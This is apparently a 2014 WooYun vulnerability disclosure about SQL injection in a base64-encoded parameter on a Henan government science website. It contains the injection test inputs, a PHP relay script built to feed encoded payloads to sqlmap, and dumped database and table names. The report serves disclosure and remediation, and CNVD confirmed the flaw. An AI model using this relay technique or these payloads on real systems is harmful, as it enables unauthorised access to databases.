乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-30: 细节已通知厂商并且等待厂商处理中 2014-08-04: 厂商已经确认,细节仅向厂商公开 2014-08-14: 细节向核心白帽子及相关领域专家公开 2014-08-24: 细节向普通白帽子公开 2014-09-03: 细节向实习白帽子公开 2014-09-13: 细节向公众公开
河南科技网http://www.hnkjt.gov.cn/
dataId=MzQxNw== 经base64解密后为3417 3417'base64加密MzQxNyc= 页面不正常
3417 and 1=1 加密 MzQxNyBhbmQgMT0x 页面正常
爆字段
爆数据库信息
暴库
这样爆表没爆出来然后使用中转~~
<?phpheader("Content-type: text/html; charset=gb2312"); set_time_limit(0);$id=$_GET["id"];$id = base64_encode($id);$url = "http://www.hnkjt.gov.cn/new/allListDetail.eiip?cid=1&dataId=".$id;$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "$url");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);$output = curl_exec($ch);curl_close($ch);print_r($output);?>
访问http://host/xx.php?id=3417丢入sqlmap系统信息
web server operating system: Windowsweb application technology: Apache 2.2.22, PHP 5.3.10back-end DBMS: MySQL 5.0.11
数据库
available databases [5]:[*] cxqybak[*] hnkjwdb_old[*] hnsti_cn_db[*] information_schema[*] mysql
和爆出的数据库一样
Database: cxqybak[188 tables]+----------------+| base_content || epdbconinfo || epdbfieldinfo || epdbfieldtype || epdbmoduleinfo || epdbphy1 || epdbphy10 || epdbphy100 || epdbphy101 || epdbphy102 || epdbphy103 || epdbphy106 || epdbphy107 || epdbphy108 || epdbphy109 || epdbphy11 || epdbphy110 || epdbphy111 || epdbphy112 || epdbphy113 || epdbphy120 || epdbphy121 || epdbphy122 || epdbphy123 || epdbphy124 || epdbphy125 || epdbphy126 || epdbphy127 || epdbphy13 || epdbphy137 || epdbphy138 || epdbphy14 || epdbphy140 || epdbphy141 || epdbphy142 || epdbphy143 || epdbphy144 || epdbphy145 || epdbphy146 || epdbphy147 || epdbphy148 || epdbphy149 || epdbphy15 || epdbphy150 || epdbphy151 || epdbphy152 || epdbphy153 || epdbphy154 || epdbphy155 || epdbphy156 || epdbphy157 || epdbphy158 || epdbphy159 || epdbphy16 || epdbphy160 || epdbphy161 || epdbphy162 || epdbphy163 || epdbphy164 || epdbphy165 || epdbphy166 || epdbphy167 || epdbphy168 || epdbphy169 || epdbphy17 || epdbphy170 || epdbphy171 || epdbphy172 || epdbphy173 || epdbphy174 || epdbphy175 || epdbphy176 || epdbphy18 || epdbphy186 || epdbphy187 || epdbphy188 || epdbphy189 || epdbphy19 || epdbphy191 || epdbphy192 || epdbphy193 || epdbphy194 || epdbphy196 || epdbphy197 || epdbphy198 || epdbphy199 || epdbphy2 || epdbphy20 || epdbphy200 || epdbphy201 || epdbphy202 || epdbphy205 || epdbphy206 || epdbphy207 || epdbphy208 || epdbphy209 || epdbphy21 || epdbphy213 || epdbphy216 || epdbphy217 || epdbphy218 || epdbphy219 || epdbphy22 || epdbphy220 || epdbphy221 || epdbphy222 || epdbphy223 || epdbphy224 || epdbphy225 || epdbphy226 || epdbphy227 || epdbphy228 || epdbphy23 || epdbphy24 || epdbphy25 || epdbphy26 || epdbphy27 || epdbphy28 || epdbphy29 || epdbphy3 || epdbphy30 || epdbphy35 || epdbphy36 || epdbphy37 || epdbphy38 || epdbphy39 || epdbphy4 || epdbphy40 || epdbphy41 || epdbphy42 || epdbphy43 || epdbphy44 || epdbphy45 || epdbphy46 || epdbphy47 || epdbphy48 || epdbphy5 || epdbphy50 || epdbphy51 || epdbphy52 || epdbphy53 || epdbphy54 || epdbphy55 || epdbphy56 || epdbphy58 || epdbphy59 || epdbphy60 || epdbphy61 || epdbphy64 || epdbphy66 || epdbphy67 || epdbphy68 || epdbphy69 || epdbphy70 || epdbphy71 || epdbphy72 || epdbphy73 || epdbphy74 || epdbphy75 || epdbphy76 || epdbphy77 || epdbphy78 || epdbphy79 || epdbphy80 || epdbphy81 || epdbphy82 || epdbphy84 || epdbphy85 || epdbphy86 || epdbphy87 || epdbphy88 || epdbphy89 || epdbphy9 || epdbphy90 || epdbphy91 || epdbphy92 || epdbphy93 || epdbphy94 || epdbphy96 || epdbphy97 || epdbphy98 || epdbphy99 || epdbstandright || epdbsysinfo || ip_0_194 || ip_195_217 || ip_218_218 || ip_219_255 |+----------------+
Database: hnsti_cn_db[86 tables]
Database: hnkjwdb_old[190 tables]
危害等级:中
漏洞Rank:10
确认时间:2014-08-04 09:49
CNVD确认并复现所述情况,已经转由CNCERT下发给河南分中心处置。
暂无
